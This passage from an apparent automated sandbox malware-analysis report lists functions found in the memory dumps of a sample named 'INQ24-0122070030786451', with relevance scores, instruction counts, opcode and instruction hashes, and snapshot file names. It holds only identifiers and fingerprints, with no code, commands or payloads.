                                                                        • Opcode Fuzzy Hash: 81ac02213e2b9c19daa692246e5e444e4797041f1567184dcdabb195021c32d3
                                                                        • Instruction Fuzzy Hash: E5D0127040E3C79FDF17A3A55419546BFA5D94751535400CFD0C44B9239B25149CC7A5
                                                                        Function 0A768304 Relevance: .0, Instructions: 12COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000007.00000002.2143753504.000000000A760000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A760000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_7_2_a760000_INQ24-0122070030786451.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 1b751efaa7b6503dff50c33e8dc03ba151a224f2231c18ae6724ddb269282b02
                                                                        • Instruction ID: 75648f3e190dfb5afdd0c8be058db531a83c18f2343d7005b23bc5ee39e13262
                                                                        • Opcode Fuzzy Hash: 1b751efaa7b6503dff50c33e8dc03ba151a224f2231c18ae6724ddb269282b02
                                                                        • Instruction Fuzzy Hash: 7CD05EB0E16218DFCB14EF24D5442EA77B6BB84304F100558E40957384D7741E01CFA2
                                                                        Function 0AB770E3 Relevance: .0, Instructions: 11COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000007.00000002.2145489396.000000000AB70000.00000040.00000800.00020000.00000000.sdmp, Offset: 0AB70000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_7_2_ab70000_INQ24-0122070030786451.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 8c71ee2fe769d98d7ae2b6b1285c7f003449303ab7f54c58a934f91c3b0a1326
                                                                        • Instruction ID: 80204493e51b835e0f29b8dfc81e731ba6bb9d14f83791fa53a7172259367860
                                                                        • Opcode Fuzzy Hash: 8c71ee2fe769d98d7ae2b6b1285c7f003449303ab7f54c58a934f91c3b0a1326
                                                                        • Instruction Fuzzy Hash: 54D0C778604209DFD724EB54E408B9E37A6E785305F00409551195BBC5C6B459459B51
                                                                        Function 0A7672B0 Relevance: .0, Instructions: 10COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000007.00000002.2143753504.000000000A760000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A760000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_7_2_a760000_INQ24-0122070030786451.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 7d13e27de8bcee1980b5d7ccd67fa92eba25b1733677d18a9915d3eb99334073
                                                                        • Instruction ID: f2b6941907a9b0fd8d606726319c289ad56db998bf2f52e6d2cd7ead2e1bb13a
                                                                        • Opcode Fuzzy Hash: 7d13e27de8bcee1980b5d7ccd67fa92eba25b1733677d18a9915d3eb99334073
                                                                        • Instruction Fuzzy Hash: 64D09E74D16318DFCBA0CF24E845799BBB5BB09304F10C094D84DA3341CB751988CF61
                                                                        Function 0A767AC8 Relevance: .0, Instructions: 9COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000007.00000002.2143753504.000000000A760000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A760000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_7_2_a760000_INQ24-0122070030786451.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: e6bc045c42277b2152be1edec96fc519008b6047aeda4d007a7bc02c12508283
                                                                        • Instruction ID: fc0a37d66e711b92a7e0ef12a8bcdfd9c397f2f67e7e374a227797a584d6e7c0
                                                                        • Opcode Fuzzy Hash: e6bc045c42277b2152be1edec96fc519008b6047aeda4d007a7bc02c12508283
                                                                        • Instruction Fuzzy Hash: 94C00276E5001A9A8B00DAD9E4508DCB774EB94321B004066E224A6104D63015268B50
                                                                        Function 08FFBCA1 Relevance: .0, Instructions: 8COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000007.00000002.2136119161.0000000008FF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 08FF0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_7_2_8ff0000_INQ24-0122070030786451.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: e1567808848753befbdf54f401d810bac2e143c7f2b4b7dff2a50327a6bd8c2a
                                                                        • Instruction ID: 80c53a0113ae86a16835161cb6fecd4aec77648fb695ff7e30567a268dbcc92f
                                                                        • Opcode Fuzzy Hash: e1567808848753befbdf54f401d810bac2e143c7f2b4b7dff2a50327a6bd8c2a
                                                                        • Instruction Fuzzy Hash: B2C0483820E3C40FDB036B3048646887F219F43619B8900DFC2808B2A7969D1819CBAA
                                                                        Function 08FFE170 Relevance: .0, Instructions: 8COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000007.00000002.2136119161.0000000008FF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 08FF0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_7_2_8ff0000_INQ24-0122070030786451.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 9145439845d19ed285ef8ed2e2731e53e84310996d3e08af64ba1494253e8755
                                                                        • Instruction ID: a5ced1602b898661de329531365079a034e3d75a808f59c5ffcbefa728424f66
                                                                        • Opcode Fuzzy Hash: 9145439845d19ed285ef8ed2e2731e53e84310996d3e08af64ba1494253e8755
                                                                        • Instruction Fuzzy Hash: 58C0927A140208EFC700DF69E848C85BBB8EF1977171180A1FA088B332C732EC60DA94
                                                                        Function 0A767318 Relevance: .0, Instructions: 8COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000007.00000002.2143753504.000000000A760000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A760000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_7_2_a760000_INQ24-0122070030786451.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: c472adf1ad6bbbeab4c33d2bc4af6adc307fca8ef4ea1459ee23ef724a8a99b6
                                                                        • Instruction ID: 7fc7a13373f8febde3269242a4c45b59f33dfd38815432d6b5669bbe707e6a34
                                                                        • Opcode Fuzzy Hash: c472adf1ad6bbbeab4c33d2bc4af6adc307fca8ef4ea1459ee23ef724a8a99b6
                                                                        • Instruction Fuzzy Hash: E2D0EA74E04228EFDB64DF65D885B9DBBB1AB06304F0190DAA84DA3651DB341E84CF21
                                                                        Function 07249CD0 Relevance: .0, Instructions: 5COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000007.00000002.2127948572.0000000007240000.00000040.00000800.00020000.00000000.sdmp, Offset: 07240000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_7_2_7240000_INQ24-0122070030786451.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 684aafad594658bbd9b5e4daf3797cca39cebb10ce254e7191d6d9b3fb590fee
                                                                        • Instruction ID: c2b57fa6f9289d7c52ce4316b2f710fb7947c17d6e021bca33ca7f564c155791
                                                                        • Opcode Fuzzy Hash: 684aafad594658bbd9b5e4daf3797cca39cebb10ce254e7191d6d9b3fb590fee
                                                                        • Instruction Fuzzy Hash: 9190023104664C9B85413795740B596779DD5445267C01451A50D42D015A7964A04995

                                                                        Non-executed Functions

                                                                        Function 08FF34B0 Relevance: 16.2, Strings: 12, Instructions: 1177COMMON
                                                                        Download Yara Rule
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000007.00000002.2136119161.0000000008FF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 08FF0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_7_2_8ff0000_INQ24-0122070030786451.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: ,aq$4$$]q$$]q$$]q$$]q$$]q$$]q$$]q$$]q$$]q$$]q
                                                                        • API String ID: 0-3443518476
                                                                        • Opcode ID: 075004aa383843ddeb18b5b1faa28c5eb029c3303611c34231ae45f946997598
                                                                        • Instruction ID: 1660bb947f117cc844094dd31407952a956b71c2ade725da4873ab2dd9175cce
                                                                        • Opcode Fuzzy Hash: 075004aa383843ddeb18b5b1faa28c5eb029c3303611c34231ae45f946997598
                                                                        • Instruction Fuzzy Hash: 50B20974A00218CFDB14CFA9C894BADB7B6FF88701F1585A9E605AB3A6DB709D41CF50
                                                                        Function 08FF37D7 Relevance: 8.0, Strings: 6, Instructions: 495COMMON
                                                                        Download Yara Rule
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000007.00000002.2136119161.0000000008FF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 08FF0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_7_2_8ff0000_INQ24-0122070030786451.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: ,aq$4$$]q$$]q$$]q$$]q
                                                                        • API String ID: 0-324474496
                                                                        • Opcode ID: c450d0481a7188ad0d57445de5d0bd16eab6db79962d2f006b74fd1a60646c7c
                                                                        • Instruction ID: 30bb40fbcdc3c4883a204d4b32d70fcc07eced6220edb1ddc7d274051cbefec9
                                                                        • Opcode Fuzzy Hash: c450d0481a7188ad0d57445de5d0bd16eab6db79962d2f006b74fd1a60646c7c
                                                                        • Instruction Fuzzy Hash: 92220E74A00219CFDB24DF65C894BADB7B2FF48705F1580A9E609AB3A6DB709D81CF50
                                                                        Function 08FF4AB8 Relevance: 2.8, Strings: 2, Instructions: 333COMMON
                                                                        Download Yara Rule
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000007.00000002.2136119161.0000000008FF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 08FF0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_7_2_8ff0000_INQ24-0122070030786451.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: (aq$,aq
                                                                        • API String ID: 0-1929014441
                                                                        • Opcode ID: d5d9c3edef962d4589d78b6ff30cfade25add7923e55dabbdff554acfce23779
                                                                        • Instruction ID: 1f2fc89e1820d407310d45074a613656adab37f3c0860b8dc23bb2b6248acf97
                                                                        • Opcode Fuzzy Hash: d5d9c3edef962d4589d78b6ff30cfade25add7923e55dabbdff554acfce23779
                                                                        • Instruction Fuzzy Hash: 29D11975A00205CFDB14CF69C584A6AB7F2BF98711F2584A9E615AB372DB30EC82CB54
                                                                        Function 0A830F50 Relevance: 1.5, Strings: 1, Instructions: 281COMMON
                                                                        Download Yara Rule
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000007.00000002.2144734678.000000000A830000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A770000, based on PE: true
                                                                        • Associated: 00000007.00000002.2143947753.000000000A770000.00000004.08000000.00040000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_7_2_a770000_INQ24-0122070030786451.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: \V;m
                                                                        • API String ID: 0-3340750809
                                                                        • Opcode ID: 96fb39e406a23c2b9daeaac0ecc7942e5c4b305c1bc8f78e6a5d12fcf874b396
                                                                        • Instruction ID: 6da44c2c31bda656e5e61b2826b179c58547f86d5785b702a019be395c6362d8
                                                                        • Opcode Fuzzy Hash: 96fb39e406a23c2b9daeaac0ecc7942e5c4b305c1bc8f78e6a5d12fcf874b396
                                                                        • Instruction Fuzzy Hash: 1DB15C71E142099FDF10CFA9C9997EEBBF2AF88704F148229D815E7294EB749845CF81
                                                                        Function 08FF0160 Relevance: 1.5, Strings: 1, Instructions: 266COMMON
                                                                        Download Yara Rule
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000007.00000002.2136119161.0000000008FF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 08FF0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_7_2_8ff0000_INQ24-0122070030786451.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: Te]q
                                                                        • API String ID: 0-52440209
                                                                        • Opcode ID: 224dc711c3ed563c761cff625d54cf353f584cf20e5f4c60d6c500166b255dcb
                                                                        • Instruction ID: 9b77192a4a14a83e15b425143e8688ef2ff7a048fe3afbc62687e59fa5647bb6
                                                                        • Opcode Fuzzy Hash: 224dc711c3ed563c761cff625d54cf353f584cf20e5f4c60d6c500166b255dcb
                                                                        • Instruction Fuzzy Hash: 91B129B4E05608CFDB64CFA9D944B9DB7F2FF89301F1080A9D509AB2A6DB705985CF11
                                                                        Function 08FF0150 Relevance: 1.5, Strings: 1, Instructions: 262COMMON
                                                                        Download Yara Rule
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000007.00000002.2136119161.0000000008FF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 08FF0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_7_2_8ff0000_INQ24-0122070030786451.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: Te]q
                                                                        • API String ID: 0-52440209
                                                                        • Opcode ID: 4bb6ecfdef936f95ea01640947941026502a7df4838dbf9bbdcaa303e558c8f7
                                                                        • Instruction ID: caa3a97fedae4fb2796391eed3166a9371c6e4a73914fa72c5faf160cb86417b
                                                                        • Opcode Fuzzy Hash: 4bb6ecfdef936f95ea01640947941026502a7df4838dbf9bbdcaa303e558c8f7
                                                                        • Instruction Fuzzy Hash: 0FB128B4E05608CFDB24CF69D984B9DBBF2FF89305F1080A9D509AB2A6DB705985CF11
                                                                        Function 0A830C08 Relevance: 1.5, Strings: 1, Instructions: 238COMMON
                                                                        Download Yara Rule
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000007.00000002.2144734678.000000000A830000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A770000, based on PE: true
                                                                        • Associated: 00000007.00000002.2143947753.000000000A770000.00000004.08000000.00040000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_7_2_a770000_INQ24-0122070030786451.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: \V;m
                                                                        • API String ID: 0-3340750809
                                                                        • Opcode ID: 4feac74bf2e77130d6aa6eb72c0513f4d8be8f3d4d970c5a9540724cbe9d6b76
                                                                        • Instruction ID: 02c6fb6a3a0f2813bb81b13068d580e56f67b5994b7d0c33301236d1a80fdbdc
                                                                        • Opcode Fuzzy Hash: 4feac74bf2e77130d6aa6eb72c0513f4d8be8f3d4d970c5a9540724cbe9d6b76
                                                                        • Instruction Fuzzy Hash: 05917D71E14209DFDF14DFA8D98579EBBF2AF88304F148129E405E7294EB349846CF81
                                                                        Function 0A768088 Relevance: 1.4, Strings: 1, Instructions: 100COMMON
                                                                        Download Yara Rule
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000007.00000002.2143753504.000000000A760000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A760000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_7_2_a760000_INQ24-0122070030786451.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: x
                                                                        • API String ID: 0-2363233923
                                                                        • Opcode ID: 8bc07844cbafcb4f1e8a618732ab1e2a9a5d125c98cb8db644b7f38b0153270d
                                                                        • Instruction ID: 9798f80fdca982b94c4b79c8f89876686b8209b9df2a38afa0041d04a5e255ae
                                                                        • Opcode Fuzzy Hash: 8bc07844cbafcb4f1e8a618732ab1e2a9a5d125c98cb8db644b7f38b0153270d
                                                                        • Instruction Fuzzy Hash: AC416E71E05A189FEB5CCF6B8D4479AFAF3AFC9201F14C1B9D84CAA255DB3009858F11
                                                                        Function 0A766140 Relevance: .4, Instructions: 431COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000007.00000002.2143753504.000000000A760000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A760000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_7_2_a760000_INQ24-0122070030786451.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 988eb02fe35ef74ade3416d181a441f1234a78d88b544ba775b24b25c1980f19
                                                                        • Instruction ID: 6e1449e391e76564c0245b05756443ffeb3a2d19fbc93655f24330568c010f1e
                                                                        • Opcode Fuzzy Hash: 988eb02fe35ef74ade3416d181a441f1234a78d88b544ba775b24b25c1980f19
                                                                        • Instruction Fuzzy Hash: 6B12B370E106588FDB18CFAAC98069DFBF2BF88304F64C169D458EB21AD734A946CF54
                                                                        Function 0A766130 Relevance: .1, Instructions: 123COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000007.00000002.2143753504.000000000A760000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A760000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_7_2_a760000_INQ24-0122070030786451.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: e249171e1bee9bc7812b450e73b5f4826f45579dfe0990cbcafd959e01cbb7ac
                                                                        • Instruction ID: 31c407d74999fa393b32403c1ddcbfe428deef3dcfc6adddc22cf829bfd4436a
                                                                        • Opcode Fuzzy Hash: e249171e1bee9bc7812b450e73b5f4826f45579dfe0990cbcafd959e01cbb7ac
                                                                        • Instruction Fuzzy Hash: A54155B1E016198BDB18CFABD94069EFBF3AFC8300F14C16AD958AB265DA3059468F54
                                                                        Function 0AB70040 Relevance: .1, Instructions: 106COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000007.00000002.2145489396.000000000AB70000.00000040.00000800.00020000.00000000.sdmp, Offset: 0AB70000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_7_2_ab70000_INQ24-0122070030786451.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: b8660ccb3495bf756c015497649cfa89d7c54187bab7ea7c1d8953efc532bc4e
                                                                        • Instruction ID: 070c4a958a141ec3af56fbe792711f7583a4f4010c2813f53d9626520b80b47b
                                                                        • Opcode Fuzzy Hash: b8660ccb3495bf756c015497649cfa89d7c54187bab7ea7c1d8953efc532bc4e
                                                                        • Instruction Fuzzy Hash: 1551EA74D05229CBEB68DF26D9487DDBBF2EF89300F0080EA951DA7654D7B40A85DF01
                                                                        Function 0AB7001B Relevance: .1, Instructions: 72COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000007.00000002.2145489396.000000000AB70000.00000040.00000800.00020000.00000000.sdmp, Offset: 0AB70000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_7_2_ab70000_INQ24-0122070030786451.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 69c8fa3b54708bbc566bb8b3a27e9ea94904517c2f272b63f08da07ad735c6ba
                                                                        • Instruction ID: 5a1ae30716667bda011ee283fe614c56bd8400bfdd121cb8d4d1100622bea53d
                                                                        • Opcode Fuzzy Hash: 69c8fa3b54708bbc566bb8b3a27e9ea94904517c2f272b63f08da07ad735c6ba
                                                                        • Instruction Fuzzy Hash: 04312971D056598BEB29CF2B995469AFBF2AFC9300F04C0EBD418A6255D7740A869F01
                                                                        Function 08FFA828 Relevance: 7.7, Strings: 6, Instructions: 157COMMON
                                                                        Download Yara Rule
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000007.00000002.2136119161.0000000008FF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 08FF0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_7_2_8ff0000_INQ24-0122070030786451.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: (aq$4']q$4']q$4']q$4']q$paq
                                                                        • API String ID: 0-463314800
                                                                        • Opcode ID: e81d06aebebe6f846dfd8726ac480d1bd849a0a61ff17e8ba2ebc5b3d39bc2e7
                                                                        • Instruction ID: c583ec63e3f4d5900ae71359ff5b7a25f047c10aa9aa145ab64a78653a6cfb4d
                                                                        • Opcode Fuzzy Hash: e81d06aebebe6f846dfd8726ac480d1bd849a0a61ff17e8ba2ebc5b3d39bc2e7
                                                                        • Instruction Fuzzy Hash: 2E519174A002068FC719DF7988506AEBBE7BFC9300F24882DD5499B3A6DF749D4687A1
                                                                        Function 07BD0688 Relevance: 6.4, Strings: 5, Instructions: 166COMMON
                                                                        Download Yara Rule
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000007.00000002.2131099028.0000000007BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07BD0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_7_2_7bd0000_INQ24-0122070030786451.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: 4']q$4']q$$]q$$]q$$]q
                                                                        • API String ID: 0-2353078639
                                                                        • Opcode ID: 66d86d68a9932bbb6890f64c7a25d978e2793a0302401a2ed3069794bfe4f0ba
                                                                        • Instruction ID: e511a625cdd58c128ade992a4c246c5ec2f6bc2d9c32607224da9155b7408135
                                                                        • Opcode Fuzzy Hash: 66d86d68a9932bbb6890f64c7a25d978e2793a0302401a2ed3069794bfe4f0ba
                                                                        • Instruction Fuzzy Hash: BD5128F1714246CBEB28AA28841467A7BE2EFC5610F1484EAD545CF251FB36CD45CBE2
                                                                        Function 07BD19B8 Relevance: 5.3, Strings: 4, Instructions: 287COMMON
                                                                        Download Yara Rule
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000007.00000002.2131099028.0000000007BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07BD0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_7_2_7bd0000_INQ24-0122070030786451.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: 4']q$4']q$4']q$4']q
                                                                        • API String ID: 0-1785108022
                                                                        • Opcode ID: 2b67699272d857fd51db75f886f614cfd80cc9f182159c17d5950265546a8906
                                                                        • Instruction ID: 4dfe494fc0642372cd1588fd2188cd63b902a817a68156b0f51e4027f664ed30
                                                                        • Opcode Fuzzy Hash: 2b67699272d857fd51db75f886f614cfd80cc9f182159c17d5950265546a8906
                                                                        • Instruction Fuzzy Hash: 58A1D3F1B0420E8FEB249F6DC45466AB7E2EF89610B26C4FAD4159B241FB31CC81CB91
                                                                        Function 097012D8 Relevance: 5.2, Strings: 4, Instructions: 208COMMON
                                                                        Download Yara Rule
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000007.00000002.2137399920.0000000009700000.00000040.00000800.00020000.00000000.sdmp, Offset: 095B0000, based on PE: true
                                                                        • Associated: 00000007.00000002.2136187409.00000000095B0000.00000004.08000000.00040000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_7_2_95b0000_INQ24-0122070030786451.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: (_]q$(_]q$(_]q$(_]q
                                                                        • API String ID: 0-2651352888
                                                                        • Opcode ID: 6c99ca3ca25934fb2d0997e6f5caec283564f60827c94b6e9dd8c6c71bfe9685
                                                                        • Instruction ID: 387dfb644d21bfd536219743893fc91d9b87f7bf24b282e7a31b516161b127fd
                                                                        • Opcode Fuzzy Hash: 6c99ca3ca25934fb2d0997e6f5caec283564f60827c94b6e9dd8c6c71bfe9685
                                                                        • Instruction Fuzzy Hash: FC71CF75A08245CFC704DF78C4A59AEBBF2EF86310B5485ADE4469B3A2EB31DC45CB90
                                                                        Function 0AB86288 Relevance: 5.1, Strings: 4, Instructions: 73COMMON
                                                                        Download Yara Rule
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000007.00000002.2145489396.000000000AB70000.00000040.00000800.00020000.00000000.sdmp, Offset: 0AB70000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_7_2_ab70000_INQ24-0122070030786451.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: &$.$D$F
                                                                        • API String ID: 0-3847822827
                                                                        • Opcode ID: 196a903afba36247d7be4fef25ba79fb65ecb03a1e9e661b86729e2d115de270
                                                                        • Instruction ID: 19a13aef1ede3f98a4b2c6d5655750a37a149f9630bec8d36fe498205d63069c
                                                                        • Opcode Fuzzy Hash: 196a903afba36247d7be4fef25ba79fb65ecb03a1e9e661b86729e2d115de270
                                                                        • Instruction Fuzzy Hash: 1B3129B09062289FEB64EF69C9587DDBBF5FB49300F0041E9D109B7291CB785A84CF55
                                                                        Function 07BD030B Relevance: 5.0, Strings: 4, Instructions: 46COMMON
                                                                        Download Yara Rule
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000007.00000002.2131099028.0000000007BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07BD0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_7_2_7bd0000_INQ24-0122070030786451.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: 4']q$4']q$$]q$$]q
                                                                        • API String ID: 0-978391646
                                                                        • Opcode ID: 17f1200bbfad50fc38344804d15975caf22d4011657b4d776d0ff9613fb0403c
                                                                        • Instruction ID: 5baa057f9dbbc6f9004138a5a4ea902b243f07fa9ec2661719d4a1569a65f2a3
                                                                        • Opcode Fuzzy Hash: 17f1200bbfad50fc38344804d15975caf22d4011657b4d776d0ff9613fb0403c
                                                                        • Instruction Fuzzy Hash: CE01D1A170D3869FE73B262C58201582FF29BC6A60B1A44E3C080CF3A7DA548C0683A7